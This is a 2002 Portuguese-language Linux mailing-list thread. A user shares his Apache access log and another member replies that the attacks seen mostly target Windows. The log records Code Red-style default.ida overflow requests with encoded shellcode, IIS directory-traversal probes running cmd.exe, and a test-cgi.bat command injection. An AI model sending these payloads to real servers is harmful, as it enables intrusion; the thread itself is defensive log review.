(linux-br) RES: (linux-br) log apache

Adriano Frare Tue, 13 Aug 2002 18:43:27 -0700

Analisando o seu log vc est� recebendo ataques. Estes ataque na sua grande
maioria � referente a plataforma WINDOWS e portanto n�o afeta o LINUX.




Adriano Frare
Linux User: 241146
++++++++++++++++++++++++++++++++++++++++
+ Livro Aplica��es Avan�adas em Linux  +
+ http://www.apliavlinux.netabc.com.br +
++++++++++++++++++++++++++++++++++++++++

-----Mensagem original-----
De: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]Em nome de [EMAIL PROTECTED]
Enviada em: ter�a-feira, 13 de agosto de 2002 15:51
Para: [EMAIL PROTECTED]
Assunto: (linux-br) log apache


Desculpem a minha ignorancia, mas esse � o log do apache, gostaria de saber
se alguma coisa indica alguma atividade suspeita
[]'s
Allan Patrick


-----
200.181.232.69 - - [12/Aug/2002:15:21:52 -0300] "GET / HTTP/1.1" 200 435
200.181.232.69 - - [12/Aug/2002:15:21:53 -0300] "GET /kd.gif HTTP/1.1" 200
22220
200.181.232.69 - - [12/Aug/2002:15:21:53 -0300] "GET /pssnd.wav HTTP/1.1"
200 16812
200.181.232.69 - - [12/Aug/2002:15:21:56 -0300] "GET /prcp.html HTTP/1.1"
200 1546
200.181.232.69 - - [12/Aug/2002:15:22:13 -0300] "GET /3time7s.wav HTTP/1.1"
200 172196
200.181.232.69 - - [12/Aug/2002:15:22:26 -0300] "GET /1curto.wav HTTP/1.1"
200 249532
200.181.232.69 - - [12/Aug/2002:15:22:34 -0300] "GET /filme1.gif HTTP/1.1"
200 42880
200.181.232.69 - - [12/Aug/2002:15:22:40 -0300] "GET /ford_internas.gif
HTTP/1.1" 200 1234
200.181.232.69 - - [12/Aug/2002:15:22:41 -0300] "GET /fogo.jpg HTTP/1.1" 200
14457
200.181.232.69 - - [12/Aug/2002:15:22:53 -0300] "GET /2time15s.wav HTTP/1.1"
200 343204
200.203.129.144 - - [12/Aug/2002:16:50:05 -0300] "GET / HTTP/1.1" 200 435
200.203.129.144 - - [12/Aug/2002:16:50:05 -0300] "GET /kd.gif HTTP/1.1" 200
22220
200.203.129.144 - - [12/Aug/2002:16:50:06 -0300] "GET /pssnd.wav HTTP/1.1"
200 16812
200.203.129.144 - - [12/Aug/2002:16:50:24 -0300] "GET /prcp.html HTTP/1.1"
200 1546
200.203.129.144 - - [12/Aug/2002:16:51:35 -0300] "GET /3time7s.wav HTTP/1.1"
200 172196
200.203.129.144 - - [12/Aug/2002:16:52:08 -0300] "GET /1curto.wav HTTP/1.1"
200 249532
200.203.129.144 - - [12/Aug/2002:16:52:39 -0300] "GET /filme1.gif HTTP/1.1"
200 42880
200.203.129.144 - - [12/Aug/2002:16:53:12 -0300] "GET /ford_internas.gif
HTTP/1.1" 200 1234
200.203.129.144 - - [12/Aug/2002:16:53:16 -0300] "GET /fogo.jpg HTTP/1.1"
200 14457
200.203.129.144 - - [12/Aug/2002:16:54:01 -0300] "GET /2time15s.wav
HTTP/1.1" 200 343204
202.73.224.16 - - [13/Aug/2002:05:10:23 -0300] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
 HTTP/1.0" 400 314
10.0.0.139 - - [13/Aug/2002:05:24:05 -0300] "GET / HTTP/1.0" 200 435
10.0.0.139 - - [13/Aug/2002:05:24:11 -0300] "GET /prcp.html HTTP/1.0" 200
1546
200.203.195.93 - - [13/Aug/2002:07:19:10 -0300] "a" 501 -
200.203.195.93 - - [13/Aug/2002:07:19:37 -0300]
"lslslslslslslslslslslslslslslslslslslslslslslslslsllslslslslslsllslslslslsl
sosososososososoososososo"
501 -
200.203.195.93 - - [13/Aug/2002:07:20:58 -0300] "GET / HTTP/1.1" 200 435
200.203.195.93 - - [13/Aug/2002:07:20:59 -0300] "GET /kd.gif HTTP/1.1" 200
22220
200.203.195.93 - - [13/Aug/2002:07:21:02 -0300] "GET /pssnd.wav HTTP/1.1"
200 16812
200.203.195.93 - - [13/Aug/2002:07:21:40 -0300] "GET /prcp.html HTTP/1.1"
200 1546
200.203.195.93 - - [13/Aug/2002:07:22:18 -0300] "GET /3time7s.wav HTTP/1.1"
200 65081
200.203.195.93 - - [13/Aug/2002:07:22:18 -0300] "GET /2time15s.wav HTTP/1.1"
200 76874
200.203.195.83 - - [13/Aug/2002:08:41:15 -0300] "POST index.html HTTP/1.0"
400 328
200.203.195.83 - - [13/Aug/2002:08:41:40 -0300] "GET / HTTP/1.1" 304 -
200.203.195.83 - - [13/Aug/2002:08:41:41 -0300] "GET /kd.gif HTTP/1.1" 304 -
200.203.195.83 - - [13/Aug/2002:08:41:42 -0300] "GET /pssnd.wav HTTP/1.1"
304 -
200.203.195.83 - - [13/Aug/2002:08:41:49 -0300] "GET /prcp.html HTTP/1.1"
304 -
200.203.195.83 - - [13/Aug/2002:08:44:51 -0300] "GET
/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf
HTTP/1.1" 404 288
200.203.195.83 - - [13/Aug/2002:08:45:41 -0300] "GET
/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html HTTP/1.1" 404 288
200.203.195.83 - - [13/Aug/2002:08:54:44 -0300] "POST index.html HTTP/1.0"
400 328
200.203.195.83 - - [13/Aug/2002:08:55:51 -0300] "GET / HTTP/1.1" 304 -
200.203.195.83 - - [13/Aug/2002:08:55:52 -0300] "GET /kd.gif HTTP/1.1" 304 -
200.203.195.83 - - [13/Aug/2002:08:55:53 -0300] "GET /pssnd.wav HTTP/1.1"
304 -
200.203.195.83 - - [13/Aug/2002:08:57:24 -0300] "GET /prcp.html HTTP/1.1"
304 -
200.203.195.83 - - [13/Aug/2002:08:57:29 -0300] "GET /3time7s.wav HTTP/1.1"
206 53771
200.203.195.83 - - [13/Aug/2002:08:57:29 -0300] "GET /1curto.wav HTTP/1.1"
200 51681
61.96.8.46 - - [13/Aug/2002:11:00:46 -0300] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
 HTTP/1.0" 400 314
200.80.144.19 - - [13/Aug/2002:11:31:39 -0300] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 272
200.80.144.19 - - [13/Aug/2002:11:31:40 -0300] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 270
200.80.144.19 - - [13/Aug/2002:11:31:40 -0300] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 280
200.80.144.19 - - [13/Aug/2002:11:31:41 -0300] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 280
200.80.144.19 - - [13/Aug/2002:11:31:42 -0300] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
200.80.144.19 - - [13/Aug/2002:11:31:42 -0300] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 311
200.80.144.19 - - [13/Aug/2002:11:31:43 -0300] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 311
200.80.144.19 - - [13/Aug/2002:11:31:43 -0300] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
HTTP/1.0" 404 327
200.80.144.19 - - [13/Aug/2002:11:31:44 -0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
200.80.144.19 - - [13/Aug/2002:11:31:45 -0300] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
200.80.144.19 - - [13/Aug/2002:11:31:45 -0300] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
200.80.144.19 - - [13/Aug/2002:11:31:46 -0300] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
200.80.144.19 - - [13/Aug/2002:11:31:46 -0300] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 277
200.80.144.19 - - [13/Aug/2002:11:31:47 -0300] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 277
200.80.144.19 - - [13/Aug/2002:11:31:48 -0300] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
200.80.144.19 - - [13/Aug/2002:11:31:48 -0300] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294

_________________________________________________________
Oi! Voc� quer um iG-mail gratuito?
Ent�o clique aqui: http://registro.ig.com.br/





Assinantes em 13/08/2002: 2223
Mensagens recebidas desde 07/01/1999: 178978
Historico e [des]cadastramento: http://linux-br.conectiva.com.br
Assuntos administrativos e problemas com a lista: 
            mailto:[EMAIL PROTECTED]

(linux-br) RES: (linux-br) log apache

Responder a